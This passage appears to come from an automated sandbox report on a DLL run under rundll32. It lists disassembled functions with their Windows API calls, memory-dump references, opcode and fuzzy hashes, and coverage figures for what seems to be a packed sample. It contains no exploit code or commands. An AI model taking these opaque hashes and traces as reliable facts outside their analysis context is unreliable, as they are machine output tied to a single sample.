                                                                                                                      • Opcode ID: 7ea3a893bf3bd11cad7cd0372379ff1f7e327c259811a7a92178e9d3a0fb71f7
                                                                                                                      • Instruction ID: 43f41ac90f78858b98c9d7795bb0f5538c3c8e7231dcd18d5b884ccf0efad8a7
                                                                                                                      • Opcode Fuzzy Hash: 7ea3a893bf3bd11cad7cd0372379ff1f7e327c259811a7a92178e9d3a0fb71f7
                                                                                                                      • Instruction Fuzzy Hash: 78013D3640054EBFCF139F86DC41CEE3F66FB19295F558415FA1898121C636DAB1AB82
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1002BC31 Relevance: 6.0, APIs: 4, Instructions: 48memoryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SysStringLen.OLEAUT32(?), ref: 1002BC45
                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,0000000C,1002D018,00000000,00000018,1002D35E), ref: 1002BC5D
                                                                                                                      • SysAllocStringByteLen.OLEAUT32(00000000,00000000), ref: 1002BC65
                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000,?,?,0000000C,1002D018,00000000,00000018,1002D35E), ref: 1002BC84
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Byte$CharMultiStringWide$Alloc
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3384502665-0
                                                                                                                      • Opcode ID: 30c8667133e0e99acdefb8fda4e094958d0ee3b60e94751be478a45e222a3836
                                                                                                                      • Instruction ID: 8ac585039279df4530c17525e78cb38a3c471deb65f2ee77315d7d06ea712387
                                                                                                                      • Opcode Fuzzy Hash: 30c8667133e0e99acdefb8fda4e094958d0ee3b60e94751be478a45e222a3836
                                                                                                                      • Instruction Fuzzy Hash: 15F09671106774BF932157629D8CC9BBF9CFE8F3F5B11052AF549C2100D6629800C6F5
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1003A545 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 100352EC: __getptd_noexit.LIBCMT ref: 100352ED
                                                                                                                        • Part of subcall function 100352EC: __amsg_exit.LIBCMT ref: 100352FA
                                                                                                                      • __amsg_exit.LIBCMT ref: 1003A571
                                                                                                                      • __lock.LIBCMT ref: 1003A581
                                                                                                                      • InterlockedDecrement.KERNEL32(?), ref: 1003A59E
                                                                                                                      • InterlockedIncrement.KERNEL32(023A1520), ref: 1003A5C9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd_noexit__lock
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2880340415-0
                                                                                                                      • Opcode ID: 77ce0df2017148a369788d84d5d9eaff25b7537eedda72ae9a584ccf42c9de33
                                                                                                                      • Instruction ID: 227b034a2befce0e561f83ae0ba5e63d07179ac23aa6a18c45afd9c28011782e
                                                                                                                      • Opcode Fuzzy Hash: 77ce0df2017148a369788d84d5d9eaff25b7537eedda72ae9a584ccf42c9de33
                                                                                                                      • Instruction Fuzzy Hash: B2016D35D01E21EFEB42DB65884575D77A0FF067A3F510105E800AF291DB25BA81CBD6
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1001DC85 Relevance: 6.0, APIs: 4, Instructions: 42COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • FindResourceA.KERNEL32 ref: 1001DCA7
                                                                                                                      • LoadResource.KERNEL32(?,00000000,?,?,?,?,1001703A,?,?,100128C0,CD5FCEB9), ref: 1001DCB3
                                                                                                                      • LockResource.KERNEL32(00000000,?,?,?,?,1001703A,?,?,100128C0,CD5FCEB9), ref: 1001DCC0
                                                                                                                      • FreeResource.KERNEL32(00000000,00000000,?,?,?,?,1001703A,?,?,100128C0,CD5FCEB9), ref: 1001DCDB
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Resource$FindFreeLoadLock
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1078018258-0
                                                                                                                      • Opcode ID: b40af9f0dfb9db239089461bda16c39fe6d8ad8ad62dd4b4922628693a12339f
                                                                                                                      • Instruction ID: 2e1bb7004ec06de307aa608eb86a555f9a12e1d63b329185fddd1afba3e53365
                                                                                                                      • Opcode Fuzzy Hash: b40af9f0dfb9db239089461bda16c39fe6d8ad8ad62dd4b4922628693a12339f
                                                                                                                      • Instruction Fuzzy Hash: 74F09676301A126B93417B654E84A7BBB9CEFC65A2701013AFE05D7211EEB1CC45C2A6
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 100174CD Relevance: 6.0, APIs: 4, Instructions: 32COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • EnableWindow.USER32(000000FF,00000001), ref: 100174ED
                                                                                                                      • GetActiveWindow.USER32 ref: 100174F8
                                                                                                                      • SetActiveWindow.USER32(000000FF), ref: 10017506
                                                                                                                      • FreeResource.KERNEL32(00000008,?,00000024,100010EC,00000000,10046640), ref: 10017522
                                                                                                                        • Part of subcall function 1001DECA: EnableWindow.USER32(?,10046640), ref: 1001DED7
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$ActiveEnable$FreeResource
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 253586258-0
                                                                                                                      • Opcode ID: eb27006848965884004c9991400e475c3ac81a8aa5cc97471f58b07f94fae74b
                                                                                                                      • Instruction ID: b8177a2bef97c6db83ac0ed626da55a545c9139c8ac7342270f03f66935dd0b6
                                                                                                                      • Opcode Fuzzy Hash: eb27006848965884004c9991400e475c3ac81a8aa5cc97471f58b07f94fae74b
                                                                                                                      • Instruction Fuzzy Hash: C5F03C34900A15CFDF12EB64CD8559DBBF2FF88702B100115E446BA161DB72AD80CE16
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1002E206 Relevance: 6.0, APIs: 4, Instructions: 21COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetTickCount.KERNEL32 ref: 1002E228
                                                                                                                      • GetTickCount.KERNEL32 ref: 1002E235
                                                                                                                      • CoFreeUnusedLibraries.OLE32 ref: 1002E244
                                                                                                                      • GetTickCount.KERNEL32 ref: 1002E24A
                                                                                                                        • Part of subcall function 1002E1AF: CoFreeUnusedLibraries.OLE32 ref: 1002E1F3
                                                                                                                        • Part of subcall function 1002E1AF: OleUninitialize.OLE32 ref: 1002E1F9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CountTick$FreeLibrariesUnused$Uninitialize
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 685759847-0
                                                                                                                      • Opcode ID: 5645409a338d605000a15fbb944d62efc2c9a6456e8d0e25dbd15ca34f7d067c
                                                                                                                      • Instruction ID: b81a2157dff59843e5c721b5fa459b83a8bef19e296eb3c7ce89af4ff474d23a
                                                                                                                      • Opcode Fuzzy Hash: 5645409a338d605000a15fbb944d62efc2c9a6456e8d0e25dbd15ca34f7d067c
                                                                                                                      • Instruction Fuzzy Hash: 3BE012358D42B4CBFB04FB20ED883A93BE8FB46305F514527D04692165DB346C59DF52
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10027CC2 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 170COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ClearVariant
                                                                                                                      • String ID: (
                                                                                                                      • API String ID: 1473721057-3887548279
                                                                                                                      • Opcode ID: 008ec943e52341c0dca71a05145884f93f6144af570bd047c2597266c283ece8
                                                                                                                      • Instruction ID: 55505e3d54abccaab23e3fb35bc0536c28338c561f08ce7921e5662988eb51c3
                                                                                                                      • Opcode Fuzzy Hash: 008ec943e52341c0dca71a05145884f93f6144af570bd047c2597266c283ece8
                                                                                                                      • Instruction Fuzzy Hash: 52517A75600B11DFCB64CF68D9C2A2AB7F5FF48314B904A6DE5868BA52C770F981CB50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 100259EE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 150COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: H_prolog3
                                                                                                                      • String ID: @
                                                                                                                      • API String ID: 431132790-2766056989
                                                                                                                      • Opcode ID: 154d677d06bdea17fd7c180cae35ab477e1537548e58b8b808fb5212b96a33b2
                                                                                                                      • Instruction ID: 3c539a28780873688809e1a5131d88fd7e7c20f84f620333ebd6e4501b894ad0
                                                                                                                      • Opcode Fuzzy Hash: 154d677d06bdea17fd7c180cae35ab477e1537548e58b8b808fb5212b96a33b2
                                                                                                                      • Instruction Fuzzy Hash: 2951D5B0A0020A9FDB04CFA8C8D8AEEB7F9FF48305F50456AE516EB251E775A945CF50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1001508F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 100150B5
                                                                                                                      • PathFindExtensionA.SHLWAPI(?), ref: 100150CB
                                                                                                                        • Part of subcall function 10014B27: _strcpy_s.LIBCMT ref: 10014B33
                                                                                                                        • Part of subcall function 10014DA8: __EH_prolog3.LIBCMT ref: 10014DC7
                                                                                                                        • Part of subcall function 10014DA8: GetModuleHandleA.KERNEL32(kernel32.dll,00000058), ref: 10014DE8
                                                                                                                        • Part of subcall function 10014DA8: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 10014DF9
                                                                                                                        • Part of subcall function 10014DA8: ConvertDefaultLocale.KERNEL32(?), ref: 10014E2F
                                                                                                                        • Part of subcall function 10014DA8: ConvertDefaultLocale.KERNEL32(?), ref: 10014E37
                                                                                                                        • Part of subcall function 10014DA8: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 10014E4B
                                                                                                                        • Part of subcall function 10014DA8: ConvertDefaultLocale.KERNEL32(?), ref: 10014E6F
                                                                                                                        • Part of subcall function 10014DA8: ConvertDefaultLocale.KERNEL32(000003FF), ref: 10014E75
                                                                                                                        • Part of subcall function 10014DA8: GetModuleFileNameA.KERNEL32(10000000,?,00000105), ref: 10014EAE
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ConvertDefaultLocale$Module$AddressFileNameProc$ExtensionFindH_prolog3HandlePath_strcpy_s
                                                                                                                      • String ID: %s.dll
                                                                                                                      • API String ID: 3444012488-3668843792
                                                                                                                      • Opcode ID: 658e8660b57156c47c50295d269887a352ab673736f5c816275cebcb6cd6bc48
                                                                                                                      • Instruction ID: 0816ccb3c2c5dc3d5c2f43fd153125c4ae2bbce82e663fde520804fb1fdab18a
                                                                                                                      • Opcode Fuzzy Hash: 658e8660b57156c47c50295d269887a352ab673736f5c816275cebcb6cd6bc48
                                                                                                                      • Instruction Fuzzy Hash: 9901B971A10118BBDF09DB74DD96AEEB3B8DF04B01F0105E9EA02DB140EEB1EE448A61
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10001FF0 Relevance: 5.2, APIs: 4, Instructions: 181COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • IsBadReadPtr.KERNEL32(00000000,00000014,?,?,?,?,100025CE,00000000,00000000), ref: 10002045
                                                                                                                      • SetLastError.KERNEL32(0000007E), ref: 10002087
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLastRead
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4100373531-0
                                                                                                                      • Opcode ID: b6f425d35b460735779e1ed3fb281948f59bf2ef0f2add24d18ae520f481b1e4
                                                                                                                      • Instruction ID: bdea880ba7c0c5bd5d2dbe714977ff7d927dc75702b615567210b407e242d671
                                                                                                                      • Opcode Fuzzy Hash: b6f425d35b460735779e1ed3fb281948f59bf2ef0f2add24d18ae520f481b1e4
                                                                                                                      • Instruction Fuzzy Hash: B181A8B4A00209EFDB04CF94C980AAEB7B1FF48354F248159E919AB355D735EE82CF94
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10020B38 Relevance: 5.1, APIs: 4, Instructions: 60COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 10020B95
                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?), ref: 10020BA5
                                                                                                                      • LocalFree.KERNEL32(?), ref: 10020BAE
                                                                                                                      • TlsSetValue.KERNEL32(?,00000000), ref: 10020BC0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalSection$EnterFreeLeaveLocalValue
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2949335588-0
                                                                                                                      • Opcode ID: 6676c0264c2eb297a537204f12f4d5c162c59b7e83937d8b07f604b269a52a54
                                                                                                                      • Instruction ID: af4df8c6ab00e3b134578f48d56f113cbd39bdf93991f651abc1e22c3acb8acd
                                                                                                                      • Opcode Fuzzy Hash: 6676c0264c2eb297a537204f12f4d5c162c59b7e83937d8b07f604b269a52a54
                                                                                                                      • Instruction Fuzzy Hash: 70113435600305EFE721CF54D9C4B9AB7AAFF0A35AF508429F5528B5A2DB71F980CB50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10020E5D Relevance: 5.0, APIs: 4, Instructions: 37COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • EnterCriticalSection.KERNEL32(10057798,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020E99
                                                                                                                      • InitializeCriticalSection.KERNEL32(?,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EA8
                                                                                                                      • LeaveCriticalSection.KERNEL32(10057798,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EB5
                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EC1
                                                                                                                        • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalSection$Enter$Exception@8InitializeLeaveThrow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3253506028-0
                                                                                                                      • Opcode ID: cf9bd6703211ded15ebc294ea5b4eaffa7e14a09b8c66129e44fb6711d6d5733
                                                                                                                      • Instruction ID: 3404b174272e1aedd22e2de365cf3e448d28d784c73140ac4aa41e98356ae93e
                                                                                                                      • Opcode Fuzzy Hash: cf9bd6703211ded15ebc294ea5b4eaffa7e14a09b8c66129e44fb6711d6d5733
                                                                                                                      • Instruction Fuzzy Hash: 5AF0907350031A9BDB10DB58FC88B1AB6AAFB96355F870816F64582123EB3264C48A61
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 100206C8 Relevance: 5.0, APIs: 4, Instructions: 31COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • EnterCriticalSection.KERNEL32(100575E0,?,?,?,10020C8D,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031), ref: 100206D1
                                                                                                                      • TlsGetValue.KERNEL32 ref: 100206E6
                                                                                                                      • LeaveCriticalSection.KERNEL32(100575E0,?,?,?,10020C8D,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031), ref: 100206FC
                                                                                                                      • LeaveCriticalSection.KERNEL32(100575E0,?,?,?,10020C8D,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031), ref: 10020707
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalSection$Leave$EnterValue
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3969253408-0
                                                                                                                      • Opcode ID: 384891d58c6dafcceaf36b456d2d2389f12afbb41143d91066085e81aa889ef7
                                                                                                                      • Instruction ID: 186a6cd651b3b82d4df79f5272d157dd9dcdda25cd8a7682fbe975f35e4e1d68
                                                                                                                      • Opcode Fuzzy Hash: 384891d58c6dafcceaf36b456d2d2389f12afbb41143d91066085e81aa889ef7
                                                                                                                      • Instruction Fuzzy Hash: 51F0FE76604720DFD320CF64DD8880B73ABEB8925135A9555F842D3123E630F8058F61
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Execution Graph

                                                                                                                      Execution Coverage:15.7%
                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                      Signature Coverage:0%
                                                                                                                      Total number of Nodes:1081
                                                                                                                      Total number of Limit Nodes:12
